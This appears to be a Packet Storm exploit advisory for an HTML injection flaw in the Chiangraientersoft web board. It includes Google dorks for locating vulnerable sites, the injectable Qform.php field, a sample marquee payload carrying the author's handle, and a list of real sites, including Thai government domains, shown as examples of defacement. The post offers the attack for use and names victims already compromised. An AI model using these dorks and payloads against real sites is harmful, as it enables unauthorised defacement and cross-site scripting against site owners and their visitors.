Sites using the Chiangraientersoft code base suffer from a html injection vulnerability that can allow for cross site scripting attacks. Note that this advisory has site-specific information.
d38dda3ba4898e2f3f8c1b2ef87a8eeca9e35edf1c91e895409139fe5385b109#Exploit Title : Chiangraientersoft HTML Injection
#Author : DevilScreaM
#Date : 05/10/2013
#Category : Web Applications
#Vendor : http://chiangraientersoft.com/
#Dork
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
#Vulnerability : HTML Injection
#Tested On : Windows 7, Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker, Muslim Hacker
HTML Injection
Vulnerable at 'Qform.php' at Field Subject/Title
*Exploit & POC
http://site-target/[PATH]/Qform.php
At Subject/Title, Input Your HTML, Example HTML
<marquee><font color=Blue size=32>DevilScreaM</font></marquee>
Example Deface with HTML Injection
http://bandai.go.th/webboard/index.php
http://tumboltasai.go.th/webboard/index.php
http://dongmada.go.th/webboard/index.php
http://phayaopuktobchawa.com/webboard/index.php
http://nungphaman.com/board/index.php
http://friends-inter.com/webboard/index.php
http://baannattawadee.com/board/index.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed